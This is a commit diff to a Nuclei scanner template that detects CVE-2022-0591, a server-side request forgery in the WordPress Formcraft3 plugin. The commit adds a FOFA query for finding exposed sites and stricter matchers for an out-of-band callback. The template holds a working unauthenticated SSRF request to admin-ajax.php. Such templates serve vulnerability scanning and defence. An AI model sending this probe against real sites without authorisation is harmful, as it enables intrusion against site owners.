Merge pull request #8142 from j4vaovo/patch-3

fix fp CVE-2022-0591.yaml
2023-09-04 23:43:23 +05:30 · 2023-09-04 23:43:23 +05:30 · 7e8f939eed
parent af080df911 a20bd30096
commit 7e8f939eed
1 changed files with 11 additions and 2 deletions
--- a/http/cves/2022/CVE-2022-0591.yaml
+++ b/http/cves/2022/CVE-2022-0591.yaml
@ -2,9 +2,10 @@ id: CVE-2022-0591

 info:
  name: Formcraft3 <3.8.28 - Server-Side Request Forgery
-  author: Akincibor
+  author: Akincibor,j4vaovo
  severity: critical
-  description: Formcraft3 before version 3.8.2  does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
+  description: |
+    Formcraft3 before version 3.8.2  does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0591
@ -18,6 +19,8 @@ info:
    epss-percentile: 0.77706
  metadata:
    max-request: 1
+    verified: true
+    fofa-query: body="formcraft3" && body="wp-"
    framework: wordpress
    vendor: subtlewebinc
    product: formcraft3
@ -28,8 +31,14 @@ http:
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'

+    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: WordPress"